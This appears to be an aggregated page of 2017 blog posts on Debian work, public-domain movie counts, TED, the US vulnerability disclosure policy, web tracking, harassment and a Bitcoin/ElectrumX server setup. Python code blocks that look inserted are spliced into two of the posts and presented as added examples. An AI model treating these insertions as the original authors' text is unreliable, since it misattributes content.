Planet Russell


Planet Debian | Russ Allbery: Free software log (October 2017)

I've not been taking the time to write these promptly in part because I've not found the time to do much free software work. Thankfully, November will at least contain some work-sponsored work (on a package that isn't widely used yet, but maybe we can make it appealing enough).

Anyway, that's for next month. For October, the only thing I have to report is refreshing the signing key for my personal Debian repository (generating a new key for the new release) and finally updating the distributions to move stretch to stable, jessie to oldstable, and create the new testing distribution (buster). If for some strange reason you're using my personal repositories (there probably isn't much reason just at the moment), be sure to upgrade eyrie-keyring, since I'm going to switch signing over to the new key shortly.

Planet Debian | Petter Reinholdtsen: Legal to share more than 3000 movies listed on IMDB?

A month ago, I blogged about my work to automatically check the copyright status of IMDB entries, and try to count the number of movies listed in IMDB that are legal to distribute on the Internet. I have continued to look for good data sources, and identified a few more. The code used to extract information from various data sources is available in a git repository, currently available from github.

So far I have identified 3186 unique IMDB title IDs. To gain better understanding of the structure of the data set, I created a histogram of the year associated with each movie (typically release year). It is interesting to notice where the peaks and dips in the graph are located. I wonder why they are placed there. I suspect World War II caused the dip around 1940, but what caused the peak around 2010?

I've so far identified ten sources for IMDB title IDs for movies in the public domain or with a free license. These are the statistics reported when running 'make stats' in the git repository:

  249 entries (    6 unique) with and   288 without IMDB title ID in free-movies-archive-org-butter.json
 2301 entries (  540 unique) with and     0 without IMDB title ID in free-movies-archive-org-wikidata.json
  830 entries (   29 unique) with and     0 without IMDB title ID in free-movies-icheckmovies-archive-mochard.json
 2109 entries (  377 unique) with and     0 without IMDB title ID in free-movies-imdb-pd.json
  291 entries (  122 unique) with and     0 without IMDB title ID in free-movies-letterboxd-pd.json
  144 entries (  135 unique) with and     0 without IMDB title ID in free-movies-manual.json
  350 entries (    1 unique) with and   801 without IMDB title ID in free-movies-publicdomainmovies.json
    4 entries (    0 unique) with and   124 without IMDB title ID in free-movies-publicdomainreview.json
  698 entries (  119 unique) with and   118 without IMDB title ID in free-movies-publicdomaintorrents.json
    8 entries (    8 unique) with and   196 without IMDB title ID in free-movies-vodo.json
 3186 unique IMDB title IDs in total

The entries without IMDB title ID are candidates to increase the data set, but might equally well be duplicates of entries already listed with IMDB title ID in one of the other sources, or represent movies that lack an IMDB title ID. I've seen examples of all these situations when peeking at the entries without IMDB title ID. Based on these data sources, the lower bound for movies listed in IMDB that are legal to distribute on the Internet is between 3186 and 4713.
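An added example (my own, not the script from the post's git repository) of the counting behind the 'make stats' output above: it validates each entry's title ID, counts entries with and without one per source, marks an ID as unique to a source when no other source carries it, and derives the lower and upper bound of the estimate. The JSON layout (an "imdb" key holding a tt-prefixed ID) and the three sample sources are constructed assumptions.

```python
"""Count IMDB title IDs across several JSON 'free movie' sources.

Added example, not the code from the post's repository. Assumed layout:
each source is a JSON list of records with an optional "imdb" key holding
a title ID such as "tt0032138". The sample sources below are constructed.
"""
import json
import re
from collections import Counter

# IMDB title IDs are "tt" followed by 7 (newer: 8) digits; anything else,
# e.g. a person ID "nm0000001", is treated as "no title ID".
IMDB_TITLE_ID = re.compile(r"^tt\d{7,8}$")

# Constructed stand-ins for files like free-movies-manual.json.
SOURCES = {
    "free-movies-a.json": json.dumps([
        {"title": "Film 1", "imdb": "tt0000001"},
        {"title": "Film 2", "imdb": "tt0000002"},
        {"title": "No id here"},
    ]),
    "free-movies-b.json": json.dumps([
        {"title": "Film 2 again", "imdb": "tt0000002"},
        {"title": "Film 3", "imdb": "tt0000003"},
        {"title": "Bad id", "imdb": "nm0000001"},
    ]),
    "free-movies-c.json": json.dumps([
        {"title": "Film 1 again", "imdb": "tt0000001"},
        {"title": "Film 4", "imdb": "tt0000004"},
        {"title": "Film 4 duplicate", "imdb": "tt0000004"},
        {"title": "Nothing"},
        {"title": "Nothing either"},
    ]),
}


def load_ids(text):
    """Return (set of valid title IDs, entries with an ID, entries without)."""
    ids, with_id, without = set(), 0, 0
    for entry in json.loads(text):
        value = entry.get("imdb")
        if isinstance(value, str) and IMDB_TITLE_ID.match(value):
            with_id += 1
            ids.add(value)
        else:
            without += 1  # missing and malformed IDs are counted alike
    return ids, with_id, without


def stats(sources):
    """Per-source rows (name, with, unique, without) plus the estimate bounds."""
    per_source = {name: load_ids(text) for name, text in sources.items()}
    # Number of sources that carry each ID; an ID carried by exactly one
    # source is "unique" to that source.
    seen_in = Counter()
    for ids, _, _ in per_source.values():
        seen_in.update(ids)
    rows, total_without = [], 0
    for name, (ids, with_id, without) in per_source.items():
        unique = sum(1 for i in ids if seen_in[i] == 1)
        rows.append((name, with_id, unique, without))
        total_without += without
    total_ids = len(seen_in)
    return {
        "rows": rows,
        "total_ids": total_ids,
        # Entries without an ID may be new titles, duplicates, or films absent
        # from IMDB, so they only widen the range rather than raise the count.
        "lower_bound": total_ids,
        "upper_bound": total_ids + total_without,
    }


def format_report(result):
    """Render rows in the layout of the 'make stats' output."""
    lines = [
        f"{w:5d} entries ({u:5d} unique) with and {n:5d} without IMDB title ID in {name}"
        for name, w, u, n in result["rows"]
    ]
    lines.append(f"{result['total_ids']:5d} unique IMDB title IDs in total")
    return "\n".join(lines)


if __name__ == "__main__":
    report = stats(SOURCES)
    print(format_report(report))
    print(f"estimate: between {report['lower_bound']} and {report['upper_bound']}")
```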

It would be great for improving the accuracy of this measurement, if the various sources added IMDB title ID to their metadata. I have tried to reach the people behind the various sources to ask if they are interested in doing this, without any replies so far. Perhaps you can help me get in touch with the people behind VODO, Public Domain Torrents, Public Domain Movies and Public Domain Review to try to convince them to add more metadata to their movie entries?

Another way you could help is by adding pages to Wikipedia about movies that are legal to distribute on the Internet. If such a page exists and includes a link to both IMDB and The Internet Archive, the script used to generate free-movies-archive-org-wikidata.json should pick up the mapping as soon as Wikidata is updated.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

TED | TED’s response to claims of sexual harassment

Photo: Marla Aufmuth / TED

We believe in ideas worth spreading. One of those ideas is that all humans are entitled to equal consideration and respect.

The Washington Post recently reported that TED has grappled with sexual harassment at its conferences and in the workplace. We would like to address that article here.

At the TED2017 conference in Vancouver, we were informed privately that four women attendees experienced sexual harassment, and another experienced aggressive behavior from male attendees.

We were alarmed by what we heard and immediately conducted full investigations to understand the context and impact of what had happened.

As a result, one man was asked to leave the conference immediately, and a second barred. These two men were the source of the five complaints, and will not return to TED.

The main TED conference attracts some 2,000 attendees, and in recent years we have been successful in increasing the percentage of women attending from about 25% to 40%. By and large, the vast majority of attendees report a wonderful experience.

But incidents do happen.

Historically, when we’ve heard that an attendee has experienced conduct that made them uncomfortable or worse, we have always investigated and done our best to resolve.

But this past year’s experience motivated us to do far more to strengthen our existing procedures. With input from experts, we put even more robust and specific anti-harassment policies and systems in place in summer 2017:

  • Making clear every attendee is aware of our code of conduct, and that violation of it would mean removal from the event.
  • Publicizing the means by which attendees can report problems.

We are determined to continue to increase the number of women who come to TED and to ensure that the conference experience is one where all attendees feel safe and respected.

The Washington Post article also mentioned two incidents alleged to have taken place at our New York-based office over the past four years. These were fully investigated at the time, and we took the claims very seriously. For the sake of the individuals mentioned, we don’t think it’s appropriate to address them in public.

We all have a strong belief in our mission and a deep respect for the perspectives and values our co-workers bring to the organization. 

We will use this story as motivation to ensure that inclusion remains at the core of our conference experience and workplace culture.


Planet Debian | Joey Hess: stupid long route

There's an old net story from the 80's, which I can't find right now, but is about two computers, 10 feet apart, having a ridiculously long network route between them, packets traveling into other states or countries and back, when they could have flowed over a short cable.

Ever since I read that, I've been collecting my own ridiculously long routes. ssh bouncing from country to country, making letters I type travel all the way around the world until they echo back on my screen. Tasting the latency that's one of the only ways we can viscerally understand just how big a tangle of wires humanity has built.

Yesterday, I surpassed all that, and I did it in a way that hearkens right back to the original story. I had two computers, 20 feet apart, I wanted one to talk to the other, and the route between the two ended up traveling not around the Earth, but almost the distance to the Moon.

I was rebuilding my home's access point, and ran into an annoying bug that prevented it from listening to wifi. I knew it was still connected over ethernet to the satellite receiver.

I connected my laptop to the satellite receiver over wifi. But, I didn't know the IP address to reach the access point. Then I remembered I had set it up so incoming ssh to the satellite receiver was directed to the access point.

So, I sshed to a computer in New Jersey. And from there I sshed to my access point. And the latency was amazing. Because, every time I pressed a key:

  • It was sent to a satellite in geosynchronous orbit, 22250 miles high.
  • Which beamed it back to a ground station in Texas, another 22250 miles.
  • Which routed it over cable to New Jersey to my server there.
  • Which bounced it back to a Texas-size dish, which zapped it back to orbit, another 22250 miles.
  • And the satellite transmitted it back in the general direction of my house, another 22250 miles.
  • So my keystroke finally reached the access point. But then it had to show me it had received it. So that whole process happened again in reverse, adding another 89000 miles travel total.
  • And finally, after 178000 and change miles of data transfer, the letter I'd typed a full second ago appeared on my screen.

Not bad for a lazy solution to a problem that could have been solved by walking across the room, eh?

Previously: roundtrip latency from a cabin with dialup in 2011

TED | It’s Nov. 18. Can we make jokes about Mugabe yet?

Comedian Carl Joshua Ncube writes: If you are about to watch my TED Talk, then you are watching the first one to have an expiry date. You see, when I went onto the red dot I was afraid, I was petrified — and this was not because of an ’80s tune or the fear of speaking in public on such a big stage. My fear was about my President Robert Mugabe. For 37 years of my life I have been filled with the fear of Mugabe, and coming to TED was my opportunity to show off my talent as a comedian, but fear got ahold of me through veiled threats from his agents about the content of my comedy.

So back to the EXPIRY of this talk… Today is the 18th of November and a historic moment for our country. Our army has seized power and as we speak we are all going out to the street to march for our FREEDOM. Today I march to end my FEAR. After you watch this, Mugabe may no longer be our PRESIDENT and I will no longer be afraid. Watch this TALK and see me when I used to be AFRAID to tell jokes! NOT ANYMORE! I am Carl Joshua Ncube and I fear nothing!


Cryptogram | New White House Announcement on the Vulnerability Equities Process

The White House has released a new version of the Vulnerabilities Equities Process (VEP). This is the inter-agency process by which the US government decides whether to inform the software vendor of a vulnerability it finds, or keep it secret and use it to eavesdrop on or attack other systems. You can read the new policy or the fact sheet, but the best place to start is Cybersecurity Coordinator Rob Joyce's blog post.

In considering a way forward, there are some key tenets on which we can build a better process.

Improved transparency is critical. The American people should have confidence in the integrity of the process that underpins decision making about discovered vulnerabilities. Since I took my post as Cybersecurity Coordinator, improving the VEP and ensuring its transparency have been key priorities, and we have spent the last few months reviewing our existing policy in order to improve the process and make key details about the VEP available to the public. Through these efforts, we have validated much of the existing process and ensured a rigorous standard that considers many potential equities.

The interests of all stakeholders must be fairly represented. At a high level we consider four major groups of equities: defensive equities; intelligence / law enforcement / operational equities; commercial equities; and international partnership equities. Additionally, ordinary people want to know the systems they use are resilient, safe, and sound. These core considerations, which have been incorporated into the VEP Charter, help to standardize the process by which decision makers weigh the benefit to national security and the national interest when deciding whether to disclose or restrict knowledge of a vulnerability.

Accountability of the process and those who operate it is important to establish confidence in those served by it. Our public release of the unclassified portions of the Charter will shed light on aspects of the VEP that were previously shielded from public review, including who participates in the VEP's governing body, known as the Equities Review Board. We make it clear that departments and agencies with protective missions participate in VEP discussions, as well as other departments and agencies that have broader equities, like the Department of State and the Department of Commerce. We also clarify what categories of vulnerabilities are submitted to the process and ensure that any decision not to disclose a vulnerability will be reevaluated regularly. There are still important reasons to keep many of the specific vulnerabilities evaluated in the process classified, but we will release an annual report that provides metrics about the process to further inform the public about the VEP and its outcomes.

Our system of government depends on informed and vigorous dialogue to discover and make available the best ideas that our diverse society can generate. This publication of the VEP Charter will likely spark discussion and debate. This discourse is important. I also predict that articles will make breathless claims of "massive stockpiles" of exploits while describing the issue. That simply isn't true. The annual reports and transparency of this effort will reinforce that fact.

Mozilla is pleased with the new charter. I am less so; it looks to me like the same old policy with some new transparency measures -- which I'm not sure I trust. The devil is in the details, and we don't know the details -- and it has giant loopholes that pretty much anything can fall through:

The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations. Vulnerabilities that fall within these categories will be cataloged by the originating Department/Agency internally and reported directly to the Chair of the ERB. The details of these categories are outlined in Annex C, which is classified. Quantities of excepted vulnerabilities from each department and agency will be provided in ERB meetings to all members.

This is me from last June:

There's a lot we don't know about the VEP. The Washington Post says that the NSA used EternalBlue "for more than five years," which implies that it was discovered after the 2010 process was put in place. It's not clear if all vulnerabilities are given such consideration, or if bugs are periodically reviewed to determine if they should be disclosed. That said, any VEP that allows something as dangerous as EternalBlue -- or the Cisco vulnerabilities that the Shadow Brokers leaked last August -- to remain unpatched for years isn't serving national security very well. As a former NSA employee said, the quality of intelligence that could be gathered was "unreal." But so was the potential damage. The NSA must avoid hoarding vulnerabilities.

I stand by that, and am not sure the new policy changes anything.

More commentary.

Here's more about the Windows vulnerabilities hoarded by the NSA and released by the Shadow Brokers.

EDITED TO ADD (11/18): More news.

Don Marti | Asking sites to do something about surveillance marketing

This might get the privacy activists mad at me, but as far as I can tell it's still counterproductive to ask a web site you visit to remove its third-party trackers.

Of course, third-party trackers are probably helping to support a political cause that most sites don't agree with, and, as Zeynep Tufekci says, "We're building a dystopia just to make people click on ads". This stuff needs to get fixed. So this is about productive next steps.

Right now, advertising on the site you're writing to probably isn't saleable without the creepy trackers. (User tracking as Chesterton's Fence) So what can privacy people productively ask sites for? Some good ones are:

  • Fix any "turn off your ad blocker" scripts to detect ad blockers only, and not falsely alert on privacy tools.

  • Remove links to the confusing and broken "YourAdChoices" site. Adtech opt-outs don't cover all trackers, and are much less effective than real privacy tools. (I have never had all the opt-outs work on that site, even from a fresh, pristine browser. Somehow I get the sense that the adtech firms don't exactly put their best people on it.)

  • Link to the privacy pages for the third parties the site uses. If the advertising on the site is set up so that this is hard to do, and users might see a tracker from an unknown domain, say so.

  • Fix up the privacy page to add links to appropriate privacy tools based on the user's browser. Better to have users on privacy tools than get enrolled in a paid whitelisting scheme.

  • If you maintain a privacy tool, offer to do a campaign with the site. Privacy tool users are high-quality human traffic. Free or discounted privacy tools might work as a subscription promotion. Where's the win-win?

Asking a site to walk away from money with no credible alternative is probably not going to work. Asking a site to consider next steps to get out of the current web advertising mess? That might.

More: What The Verge can do to help save web advertising


Cryptogram | Friday Squid Blogging: Peru and Chile Address Squid Overfishing

Peru and Chile have a new plan.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Rondam Ramblings | A Bug in the KJV

I've been studying the Bible ever since I was 12 and my parents sent me to a YMCA summer camp in Tennessee. They take the C in YMCA seriously there, and after two weeks of relentless proselytizing I finally saw The Light. For three glorious days I was born again and felt the Presence of the Holy Spirit. Then I went home and giddily told my parents the Good News. My father's reaction was

Planet Debian | Jonathan Carter: I am now a Debian Developer

It finally happened

On the 6th of April 2017, I finally took the plunge and applied for Debian Developer status. On 1 August, during DebConf in Montréal, my application was approved. If you’re paying attention to the dates you might notice that that was nearly 4 months ago already. I was trying to write a story about how it came to be, but it ended up long. Really long (current draft is around 20 times longer than this entire post). So I decided I’d rather do a proper bio page one day and just do a super short version for now so that someone might end up actually reading it.

How it started

In 1999… no wait, I can’t start there, as much as I want to, this is a short post, so… In 2003, I started doing some contract work for the Shuttleworth Foundation. I was interested in collaborating with them on tuXlabs, a project to get Linux computers into schools. For the few months before that, I was mostly using SuSE Linux. The open source team at the Shuttleworth Foundation all used Debian though, which seemed like a bizarre choice to me since everything in Debian was really old and its “boot-floppies” installer program kept crashing on my very vanilla computers. 

SLUG (Schools Linux Users Group) group photo. SLUG was founded to support the tuXlab schools that ran Linux.

My contract work then later turned into a full-time job there. This was a big deal for me, because I didn’t want to support Windows ever again, and I didn’t ever think that it would even be possible for me to get a job where I could work on free software full time. Since everyone in my team used Debian, I thought that I should probably give it another try. I did, and I hated it. One morning I went to talk to my manager, Thomas Black, and told him that I just don’t get it and I need some help. Thomas was a big mentor to me during this phase. He told me that I should try upgrading to testing, which I did, and somehow I ended up on unstable, and I loved it. Before that I used to subscribe to a website called “freshmeat” that listed new releases of upstream software and then, I would download and compile it myself so that I always had the newest versions of everything. Debian unstable made that whole process obsolete, and I became a huge fan of it. Early on I also hit a problem where two packages tried to install the same file, and I was delighted to find how easily I could find package state and maintainer scripts and fix them to get my system going again.

Thomas told me that anyone could become a Debian Developer and maintain packages in Debian and that I should check it out and joked that maybe I could eventually snap up “highvoltage@debian.org”. I just laughed because back then you might as well have told me that I could run for president of the United States, it really felt like something rather far-fetched and unobtainable at that point, but the seed was planted :)

Ubuntu and beyond

Ubuntu 4.10 default desktop – Image from distrowatch

One day, Thomas told me that Mark is planning to provide official support for Debian unstable. The details were sparse, but this was still exciting news. A few months later Thomas gave me a CD with just “warty” written on it and said that I should install it on a server so that we can try it out. It was great, it used the new debian-installer and installed fine everywhere I tried it, and the software was nice and fresh. Later Thomas told me that this system is going to be called “Ubuntu” and the desktop edition has naked people on it. I wasn’t sure what he meant and was kind of dumbfounded so I just laughed and said something like “Uh ok”. At least it made a lot more sense when I finally saw the desktop pre-release version and when it got the byline “Linux for Human Beings”. Fun fact, one of my first jobs at the foundation was to register the ubuntu.com domain name. Unfortunately I found it was already owned by a domain squatter and it was eventually handled by legal.

Closer to Ubuntu’s first release, Mark brought a whole bunch of the Debian developers who were working on Ubuntu over to the foundation, and they were around for a few days getting some sun. Thomas kept saying “Go talk to them! Go talk to them!”, but I felt so intimidated by them that I couldn’t even bring myself to walk up and say hello.

In the interest of keeping this short, I’m leaving out a lot of history but later on, I read through the Debian packaging policy and really started getting into packaging and also discovered Daniel Holbach’s packaging tutorials on YouTube. These helped me tremendously. Some day (hopefully soon), I’d like to do a similar video series that might help a new generation of packagers.

I’ve also been following DebConf online since DebConf 7, which was incredibly educational for me. Little did I know that just 5 years later I would even attend one, and another 5 years after that I’d end up being on the DebConf Committee and have also already been on a local team for one.

DebConf16 Organisers, Photo by Jurie Senekal.

It’s been a long journey for me and I would like to help anyone who is also interested in becoming a Debian maintainer or developer. If you ever need help with your package, upload it to https://mentors.debian.net and if I have some spare time I’ll certainly help you out and sponsor an upload. Thanks to everyone who has helped me along the way, I really appreciate it!

Planet Debian | Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2017

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 197 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Antoine Beaupré did 21h (out of 16h allocated + 8.75h remaining, thus keeping 3.75h for November).
  • Ben Hutchings did 20 hours (out of 15h allocated + 9 extra hours, thus keeping 4 extra hours for November).
  • Brian May did 10 hours.
  • Chris Lamb did 18 hours.
  • Emilio Pozuelo Monfort did 7 hours (out of 20.75 hours allocated + 1.5 hours remaining, thus keeping 15.25 hours for November).
  • Guido Günther did 6.5 hours (out of 11h allocated + 1 extra hour, thus keeping 5.5h for November).
  • Hugo Lefeuvre did 20h.
  • Lucas Kanashiro did 2 hours (out of 5h allocated, thus keeping 3 hours for November).
  • Markus Koschany did 19 hours (out of 20.75h allocated, thus keeping 1.75 extra hours for November).
  • Ola Lundqvist did 7.5h (out of 7h allocated + 0.5 extra hours).
  • Raphaël Hertzog did 13.5 hours (out of 12h allocated + 1.5 extra hours).
  • Roberto C. Sanchez did 11 hours (out of 20.75 hours allocated + 14.75 hours remaining, thus keeping 24.50 extra hours for November, he will give back remaining hours at the end of the month).
  • Thorsten Alteholz did 20.75 hours.

Evolution of the situation

The number of sponsored hours increased slightly to 183 hours per month. With the increasing number of security issues to deal with, and with the number of open issues not really going down, I decided to bump the funding target to what amounts to 1.5 full-time positions.

The security tracker currently lists 50 packages with a known CVE and the dla-needed.txt file 36 (we’re a bit behind in CVE triaging apparently).

Thanks to our sponsors

New sponsors are in bold.


Sociological Images | Silencing Sexual Harassment Complaints in Pakistan and the US

All hell broke loose online in Pakistan this winter after their first Oscar winner, Sharmeen Obaid, tweeted a complaint against a doctor who sent an unsolicited friendship request on Facebook to her sister following an E.R. visit. Sharmeen’s tweet provoked a firestorm of debate amongst Pakistani social media users, who shared a picture of Sharmeen posing with American film producer Harvey Weinstein “as proof” of Sharmeen’s double standards on sexual harassment.

Sharmeen Obaid, World Economic Forum (via Wikimedia Commons)

Sharmeen is not the first Pakistani to incite calls to violence by going public about abuse. Member of Parliament Ayesha Gulalai received severe and terrifying censure from social media trolls for her public accusations of sexual harassment against former-cricketer-turned-politician Imran Khan. Similar critiques have also been used against Malala Yousafzai, Pakistan’s only woman Nobel laureate, when social media users suggested that photographs of her at Oxford University wearing a bomber jacket and jeans, under a modest headscarf, looked just like porn actress Mia Khalifa.

These issues are not limited to Pakistan alone, of course. Digital harassment has been a prominent issue in the United States as well, and the tactics trolls use to challenge women who speak out about harassment are strikingly similar in both countries. Trolls in both contexts deploy words like “feminazi,” or “man-hater,” accusing women of “exaggerating,” “attention-seeking,” or of “trivializing” “real” cases of abuse to further their own taste for drama. They create fake Facebook or Twitter accounts in the name of a woman (or other abused person) going public, using these accounts to post humiliating status updates or embarrassing personal details about the survivor. Women in both cases are quickly accused of being traitors, airing their dirty laundry on a global stage with implications for the reputation of their social groups or organizations.

Comparing American and Pakistani harassment cases highlights how geographically distant and culturally different locations draw on similar vocabularies of silencing, giving rise to global patterns of sex-based subjection. They also show how assumptions about gender and power work to screen men perpetrating abuse against women and others.

Malala Yousafzai (via Claude Truong-Ngoc/Wikimedia Commons)

In the Pakistani setting, social media backlash against women who speak out about abuse taps into longer-running anxieties around women, publicity and the West. Seeing women who go public about abuse as excessively westernized, these anxieties suggest such women are exaggerating local problems before foreign audiences in order to win accolades from an unspecified “west” willing to pay “traitorous” women in visas, prizes, and scholarships for help in defaming Pakistan and Islam. While a cultural logic of purdah (literally “screen,” a logic of gendered segregation) technically separates men who abuse women, these same logics don’t protect women against men’s invasion of their privacy once women have entered public domains. Wearing jeans, studying at Oxford, going to a hospital, or having a Facebook account or a cell phone all become avenues for men to take non-intimate, public interactions into the private zone, seeking an unsolicited and unwelcome intimacy, or hiding behind the cloak of online anonymity to create humiliating memes about these women.

While gender arrangements in the US don’t operate according to purdah norms, the Harvey Weinstein case, including the doubt and shaming of women who participated in the #metoo campaign afterwards, highlights the repertoires men can use to screen their abuse of vulnerable colleagues. Bullying, browbeating, payoffs, and threats of job loss or legal action act as a kind of purdah to silence women. Similarly, American women complain about receiving unsolicited “dick pics” over various digital formats from men they barely know. Indeed, the prevalence of digital forms of harassment across both geographical settings renders online anger against people who come out about abuse inexplicable.

If there is any virtue at all to the recent firestorm, it is that Pakistanis and Americans have begun to ask: what constitutes abuse? How should people respond? Are micro-harassments, such as pictures and friendship requests, still inconsequential if they are widespread and relentless? These cases invite us to dwell more deeply on connections between geographically distant cases of sex-based oppression. Mobile feminists, moving back and forth between different contexts, can reflect more deeply on the ways that various binaries, West/Islam, Public/Private, and offline/online, complicate discussions about sexual identity, abuse and power in both locations. Highlighting how different geographic locations and cultural contexts share these problems in common can help develop a common vocabulary for talking about sex-based subjection.

Fauzia Husain is an AAUW International Doctoral Fellow and a PhD candidate at the University of Virginia, Department of Sociology. Her current research examines how Pakistani women security workers experience their work, contend with the stigma of breaching purdah (gender segregation), and enact agency at the interstices of state, gender, work and globalization.

(View original at https://thesocietypages.org/socimages)

Worse Than Failure | Error'd: Never ASSume that You're Free from Errors

"This was in an email from Nest. I'm sure in some other font this shows a heartwarming image of fluffy bunnies frolicking in an energy saving Utopia, but instead, we get this," wrote Matthew W.


"Um...yeah, sure I guess?" writes Chris U.


Stuart L. wrote, "Looks like the weather has made an 8-bit turn for the worse."


"I had no idea that the success of entering my enrollment depended on whether or not my donkey was nearby," writes Ernie D.


Jamie S. writes, "What exactly are you trying to smuggle in, Fujitsu updater?"


"I'm the fastest man alive. Don't believe me? Check this out," writes John W.



Planet DebianCraig Small: Short Delay with WordPress 4.9

You may have heard WordPress 4.9 is out. While this seems a good improvement over 4.8, it has a new editor that uses codemirror. So what’s the problem? Well, inside codemirror is jshint and this has that idiotic no evil license. I think this was added in by WordPress, not codemirror itself.

So basically WordPress 4.9 has a file, or actually a tiny part of a file, that is non-free. I’ll now have to delay the update of WordPress to hack that piece out, which probably means removing the javascript linter. Not ideal but that’s the way things go.


Planet DebianMichal Čihař: Running Bitcoin node and ElectrumX server

I've been tempted to run my own ElectrumX server for quite some time. My first attempt was to run it on a Turris Omnia router, but that turned out to be impossible due to the memory requirements of both bitcoind and ElectrumX.

This time I've dedicated a host to this and it runs fine:

Electrum connecting to btc.cihar.com

The server runs Debian sid (probably it would be doable on stretch as well, but I didn't try much) and the setup was pretty simple.

First we need to install some things: the Bitcoin daemon and the ElectrumX dependencies:

# Bitcoin daemon, not available in stretch
apt install bitcoind

# We will checkout ElectrumX from git
apt install git

# ElectrumX deps
apt install python3-aiohttp

# Build environment for ElectrumX deps
apt install build-essential python3-pip libleveldb-dev

# ElectrumX deps not packaged in Debian
pip3 install plyvel pylru

# Download ElectrumX sources (the electrumx user created below must already exist)
su - electrumx -c 'git clone https://github.com/kyuupichan/electrumx.git'

Create users which will run the services:

adduser bitcoind
adduser electrumx

Now it's time to prepare the configuration for the services. For Bitcoin it's quite simple: we need to configure the RPC interface and enable the transaction index in /home/bitcoind/.bitcoin/bitcoin.conf:

txindex=1
listen=1
rpcuser=bitcoin
rpcpassword=somerandompassword

The ElectrumX configuration is quite simple as well and it's pretty well documented. I've decided to place it in /etc/electrumx.conf:

COIN=BitcoinSegwit
DB_DIRECTORY=/home/electrumx/.electrumx
DAEMON_URL=http://bitcoin:somerandompassword@localhost:8332/
TCP_PORT=50001
SSL_PORT=50002
HOST=::

DONATION_ADDRESS=3KPccmPtejpMczeog7dcFdqX4oTebYZ3tF

SSL_CERTFILE=/etc/letsencrypt/live/btc.cihar.com/fullchain.pem
SSL_KEYFILE=/etc/letsencrypt/live/btc.cihar.com/privkey.pem

REPORT_HOST=btc.cihar.com
BANNER_FILE=banner

I've decided to control both services using systemd, so it's a matter of creating pretty simple units for that. Actually the Bitcoin one closely matches the one I've used on Turris Omnia, and the ElectrumX one matches the one they ship, but there are some minor changes.

Systemd unit for ElectrumX in /etc/systemd/system/electrumx.service:

[Unit]
Description=Electrumx
After=bitcoind.service

[Service]
EnvironmentFile=/etc/electrumx.conf
ExecStart=/home/electrumx/electrumx/electrumx_server.py
User=electrumx
LimitNOFILE=8192
TimeoutStopSec=30min

[Install]
WantedBy=multi-user.target

And finally systemd unit for Bitcoin daemon in /etc/systemd/system/bitcoind.service:

[Unit]
Description=Bitcoind
After=network.target

[Service]
ExecStart=/usr/bin/bitcoind
User=bitcoind
TimeoutStopSec=30min
Restart=on-failure
RestartSec=30

[Install]
WantedBy=multi-user.target

Now everything should be configured and it's time to start up the services:

# Enable services so that they start on boot 
systemctl enable electrumx.service bitcoind.service

# Start services
systemctl start electrumx.service bitcoind.service
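The two configuration files have to agree with each other (the credentials embedded in DAEMON_URL are the ones from bitcoin.conf, the port is bitcoind's RPC port, and txindex must be on), and a mismatch only shows up as ElectrumX failing to reach the daemon after the services are started. Here is an added example, not from the post, of a small Python check that catches these before starting; the sample file contents and the placeholder-password list are constructed.

```python
from urllib.parse import urlparse, unquote

# Constructed sample files mirroring the two configurations shown in this post.
BITCOIN_CONF = """\
txindex=1
listen=1
rpcuser=bitcoin
rpcpassword=somerandompassword
"""

ELECTRUMX_CONF = """\
COIN=BitcoinSegwit
DB_DIRECTORY=/home/electrumx/.electrumx
DAEMON_URL=http://bitcoin:somerandompassword@localhost:8332/
TCP_PORT=50001
SSL_PORT=50002
HOST=::
SSL_CERTFILE=/etc/letsencrypt/live/btc.cihar.com/fullchain.pem
SSL_KEYFILE=/etc/letsencrypt/live/btc.cihar.com/privkey.pem
REPORT_HOST=btc.cihar.com
"""

# Values that are obviously placeholders rather than real secrets (constructed list).
PLACEHOLDER_PASSWORDS = {"somerandompassword", "password", "bitcoin", "changeme", "secret"}
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_kv(text):
    """Parse KEY=VALUE lines; bitcoin.conf and a systemd EnvironmentFile share this shape."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def check_configs(bitcoin_text, electrumx_text):
    """Return the list of problems found; an empty list means the two files agree."""
    btc = parse_kv(bitcoin_text)
    ex = parse_kv(electrumx_text)
    problems = []

    # ElectrumX needs the full transaction index to serve address histories.
    if btc.get("txindex") != "1":
        problems.append("bitcoin.conf: txindex=1 is required by ElectrumX")

    url = urlparse(ex.get("DAEMON_URL", ""))
    if url.scheme != "http" or not url.hostname:
        problems.append("electrumx.conf: DAEMON_URL must look like http://user:pass@host:port/")
    else:
        # The credentials embedded in DAEMON_URL must be the ones bitcoind expects.
        if unquote(url.username or "") != btc.get("rpcuser", ""):
            problems.append("DAEMON_URL user does not match rpcuser in bitcoin.conf")
        if unquote(url.password or "") != btc.get("rpcpassword", ""):
            problems.append("DAEMON_URL password does not match rpcpassword in bitcoin.conf")
        # bitcoind serves mainnet RPC on 8332 unless rpcport overrides it.
        rpc_port = int(btc.get("rpcport", "8332"))
        if url.port != rpc_port:
            problems.append(f"DAEMON_URL port {url.port} does not match bitcoind RPC port {rpc_port}")
        # The RPC password travels in clear text, so keep the daemon on the same host.
        if url.hostname not in LOCAL_HOSTS:
            problems.append(f"DAEMON_URL host {url.hostname} is not local; RPC credentials would cross the network unencrypted")

    password = btc.get("rpcpassword", "")
    if password in PLACEHOLDER_PASSWORDS or len(password) < 16:
        problems.append("bitcoin.conf: rpcpassword is a placeholder or shorter than 16 characters")

    # A public SSL port cannot be served without both the certificate and the key.
    if ex.get("SSL_PORT") and not (ex.get("SSL_CERTFILE") and ex.get("SSL_KEYFILE")):
        problems.append("electrumx.conf: SSL_PORT set without SSL_CERTFILE and SSL_KEYFILE")
    return problems


if __name__ == "__main__":
    for problem in check_configs(BITCOIN_CONF, ELECTRUMX_CONF) or ["no problems found"]:
        print(problem)
```

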